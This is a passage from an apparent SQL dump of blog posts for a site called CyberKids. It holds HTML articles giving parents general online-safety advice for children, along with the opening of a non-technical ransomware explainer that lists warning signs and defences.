Their Social Media Usage</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media has become a primary mode of communication for kids and teens, offering both benefits and challenges. While these platforms help them stay connected with friends and express themselves, they also open the door to risks such as cyberbullying, emotional distress from comparison culture, or interactions with strangers.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Parents Can Monitor Social Media:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly check which platforms your kids are using and review their profiles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Talk to your kids about the type of content they share—ensure they avoid oversharing personal details like their location, phone number, or photos with identifiable backgrounds.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Discuss online etiquette, including kindness and respect when interacting with others.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Encourage them to alert you immediately if they experience or witness inappropriate behavior online.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Apps like Bark or Qustodio help parents monitor social media activity without being overly invasive. However, emphasize trust and transparency by explaining that your role is to guide, not to invade their privacy.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, checking in with kids regularly builds an open environment where they feel comfortable discussing their online experiences with you.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Lead by Example</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your own online habits are powerful teaching tools. Kids often mimic their parents, so demonstrating safe and responsible online behavior can leave a lasting impact.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ways to Set a Positive Example:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Be cautious about the information you share on social media—this teaches kids to value privacy.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid posting or sharing inappropriate or impulsive content, encouraging thoughtful online behavior.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Practice good cybersecurity habits, such as using strong passwords and enabling two-factor authentication.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Additionally, take time to educate yourself about online safety. As the digital landscape evolves, staying informed will allow you to better guide your kids in navigating technological changes. Share what you learn with them in a collaborative way, rather than as a lecture.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Open communication, grounded in empathy and trust, is the foundation of any successful online safety strategy. When your kids see you setting these positive habits, they’re more likely to follow suit.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Empower Your Kids for the Digital World</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keeping your kids safe online doesn’t mean restricting them from the digital world—it’s about giving them the tools to explore responsibly. By setting clear rules, using smart technologies like parental controls, educating them on risks, and involving yourself in social media monitoring, you can create an online environment that is supportive and secure.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Above all, remember that fostering an ongoing dialogue about their digital lives builds the trust and confidence they need to make safe choices on their own. With your guidance, they can fully enjoy the opportunities the internet offers while staying safe from its risks!</p>', '', NULL, NULL, 1, 'draft', '2023-11-12 03:29:35', '2026-01-12 21:41:44', 'CyberKids', '5 Tips for Keeping Your Kids Safe Online', '', NULL),
(143, 'Roadmap for Teaching Cybersecurity to Kids', 'roadmap-for-teaching-cybersecurity-to-kids', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital world is evolving rapidly, with kids spending more and more time online—from playing games and completing schoolwork to socializing on platforms like social media. While the internet offers incredible opportunities for learning and connection, it also comes with risks. Cyberbullying, hacking, identity theft, and online scams are just a few of the threats our kids face daily.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This is why teaching cybersecurity to kids at an early age is no longer optional—it’s essential. By giving them the right tools, knowledge, and habits, we can ensure they grow up navigating the digital world safely, responsibly, and confidently. Below, we’ll walk you through a step-by-step guide on how to introduce cybersecurity to kids in a way that’s engaging, easy to understand, and effective.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Kids Need to Learn Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before we get into the how, it’s important to understand <i><em class=\"italic\">why</em></i> cybersecurity education matters so much for children.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Protecting Personal Information</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Kids may not understand the full value of personal information, but it’s something hackers and scammers crave. Teaching children how to safeguard their names, addresses, and other sensitive data can protect them (and your family) from identity theft and financial scams.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Building Lifelong Skills</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The sooner kids learn about staying safe online, the more prepared they will be as they grow up and technology becomes an even more integral part of their lives. Empowering them with cybersecurity skills early on equips them to make informed decisions and take responsibility for their online behavior in the long-term.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Developing Good Digital Habits</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Kids are highly impressionable. By teaching simple safety concepts—like avoiding suspicious links or using strong passwords—you can instill habits they’ll keep for life.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Preventing Cybercrime Victimization</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A strong foundation in cybersecurity can help kids identify and avoid risky situations, making the internet a safer space for them to explore, learn, and enjoy.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now that we understand the importance, here’s a practical roadmap to help you teach cybersecurity to kids.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Introduce the Basics</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Begin by explaining what cybersecurity is and why it’s important. This can sound daunting, but simple analogies make all the difference. For instance, explain that just as we lock the doors to our homes to keep strangers out, we also need to “lock” our online activities to protect them from threats like hackers or scammers.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how to introduce the basics effectively:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Define cybersecurity as the practice of protecting personal information and online activities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Explain who hackers are and the harm they can cause, like stealing personal data or tricking people out of their money.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Highlight the importance of protecting not only their own data but also that of friends, family, and others in the community.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Use Real-Life Scenarios</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Children connect better with stories and scenarios they can relate to. Share real-life examples to help them understand the risks and consequences of unsafe online behavior.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Show how a phishing scam works by explaining what happens when someone clicks on a suspicious email link.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Create a scenario where someone falls for a fake website and loses money, and explain how they could avoid such traps by checking URLs and HTTPS certificates.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By using vivid, relatable examples, kids can better grasp the importance of cyber safety.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Teach How to Identify Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now, it’s time to focus on recognition. Teach kids how to spot the most common online threats, so they can steer clear of dangers before they escalate.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some easy-to-digest tips for kids include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Don’t trust online strangers, even if they seem friendly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Verify the source of emails asking for personal information. Encourage them to ask you or another trusted adult if they’re unsure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Check website URLs carefully. Explain how HTTPS and padlock symbols signal secure websites.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Teach them that suspicious pop-ups are a no-go, and they should never click on random advertisements online.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s all about building awareness. The more they can identify threats, the safer they’ll be.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Encourage Responsible Online Behaviour</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just about avoiding threats—it’s also about being a responsible digital citizen.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encourage kids to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Be critical thinkers when reading or seeing something online. Just because something looks real doesn’t mean it is.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Think about the impact of what they post online, as messages or photos shared now might stay on the internet forever.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Speak up if they encounter anything suspicious or uncomfortable online. Remind them that it’s okay to ask trusted adults for help when something doesn’t feel right.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Helping them understand the value and consequences of their online actions fosters responsibility and care.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5: Make Cybersecurity Fun</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learning doesn’t have to be boring. There are tons of enjoyable and interactive resources you can use to teach cybersecurity.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Educational Games</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Look for games and apps that teach cybersecurity concepts. Platforms like “Interland” from Google’s \'Be Internet Awesome\' program offer engaging ways for kids to learn how to stay safe online.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Creative Activities</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Create crossword puzzles or quizzes where kids can practice identifying phishing emails or coming up with strong passwords.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Role-Playing</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Turn learning into a game by role-playing scenarios where they need to outsmart a hacker trying to steal their personal information.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you turn cybersecurity education into a hands-on experience, it’s more likely to stick.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6: Lead By Example</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Kids learn through observation, so it’s crucial to model the online behavior you want them to adopt.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use strong passwords for your accounts and explain why you do so.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid sharing sensitive information online and encourage transparency about your internet use.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Keep lines of communication open—remind kids they can always ask you questions about cybersecurity.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your actions, paired with open and honest conversations, will reinforce the importance of good digital habits.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Skills for a Lifetime</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Teaching kids about cybersecurity isn’t just a one-time lesson—it’s an ongoing process that grows with their understanding of the internet and how they use it. By starting with the basics, using relatable scenarios, and creating fun, engaging learning opportunities, you can give kids the tools they need to confidently and safely explore the digital world.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether your child is playing online games, messaging friends, or exploring new apps, cybersecurity knowledge will go a long way in empowering them to feel in control of their online lives.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, the skills kids develop now will create habits that last a lifetime, setting them up for a future where they can use technology responsibly and safely.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital future is bright—when approached with care and awareness, it’s a place your kids can thrive!</p>', '', NULL, NULL, 1, 'draft', '2023-10-23 02:30:05', '2026-01-12 21:41:44', 'CyberKids', 'Roadmap for Teaching Cybersecurity to Kids', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(144, 'Everything about Ransomware', 'everything-about-ransomware', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware is one of the fastest-growing cybersecurity threats, affecting individuals and organizations across the globe. It’s a malicious type of software designed to encrypt a victim\'s files and hold them hostage until a ransom is paid. Over the years, ransomware attacks have become increasingly sophisticated, utilizing innovative techniques to infiltrate devices and spread across networks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog post will break down the key aspects of ransomware, helping you identify and mitigate the risks. From understanding the warning signs (Indicators of Compromise) to implementing essential safeguards, we’ll cover everything you need to know to protect yourself and your organization.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Ransomware?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware is a form of malware that locks users out of their own data by encrypting their files. Attackers then demand payment in return for the decryption key needed to recover access. These attacks target everyone from individual users to large corporations, often causing widespread disruption and financial strain.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Why is ransomware so dangerous? Beyond the financial costs, it risks sensitive data being exposed–or permanently erased if the ransom isn’t paid. And even when payments are made, there’s no guarantee the attackers will provide the decryption key.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Indicators of Compromise (IoCs): Recognizing Early Signs</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Knowing the early warning signs of a ransomware attack can help you take swift action before the damage becomes too severe. Here are the most common indicators of compromise (IoCs) to look out for:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. File Encryption</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most noticeable signs of a ransomware attack is the encryption of files. You may see files with unfamiliar extensions, or their names could be altered. Additionally, ransom notes or files named “DECRYPT_INSTRUCTIONS” often appear in affected folders, providing payment details and decryption instructions.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Unusual Network Activity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Spikes in outgoing network traffic or unusual activity on your network could point to ransomware at work. Attackers often use command-and-control servers to execute their attacks. Monitoring tools and firewalls are essential for detecting such anomalies promptly.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. New or Suspicious Processes</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A ransomware attack can create new processes or services on your system. These may have strange or unfamiliar names that don’t align with standard operating system processes. Keep an eye on newly created processes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Registry Modifications</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware often makes changes to the system registry to embed itself more deeply. Look for new or altered registry entries—manual inspections and security tools can reveal these.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Odd Activity in Event Logs</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware typically generates suspicious activity in your system’s event logs. These logs might reveal details such as the time and origin of the attack or show processes connected to the malware. Regularly reviewing event logs can provide meaningful insights into potential threats.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Protecting Yourself Against Ransomware</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While ransomware can be devastating, implementing robust mitigation strategies can significantly reduce the risk. Here are critical steps to safeguard your files and systems effectively.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">a. Regular Backups</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The best defense against ransomware is maintaining secure, up-to-date backups of your data. Even if an attack occurs, you’ll have a way to restore your files without paying a ransom. Store these backups on external devices or secure cloud storage that isn’t accessible through your network.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">b. Keep Software and Operating Systems Updated</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers often exploit outdated software with known vulnerabilities to spread ransomware. Regularly updating your operating system and software ensures you’re protected against the latest threats. Automated updates can make this process seamless.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">c. Enable Firewall Protection</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A firewall acts as the first line of defense by blocking unauthorized access to your network. Advanced firewalls can even block communications to known malicious IP addresses. Ensure your firewall is properly configured to both monitor and filter traffic.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">d. Use Antivirus Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Antivirus software is key to identifying and eliminating ransomware before it harms your files. Choose an antivirus solution that offers real-time protection and routinely scan your system for threats. Always ensure the software is updated to counter emerging threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">e. Secure Your Email</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Email remains one of the primary modes for delivering ransomware, often through phishing scams or malicious attachments. Employ email filtering solutions to block suspicious messages and educate employees and users about identifying phishing attempts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">f. User Education and Awareness</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Human error is a leading cause of successful ransomware infections. Providing regular training to employees or household users can create a more security-conscious 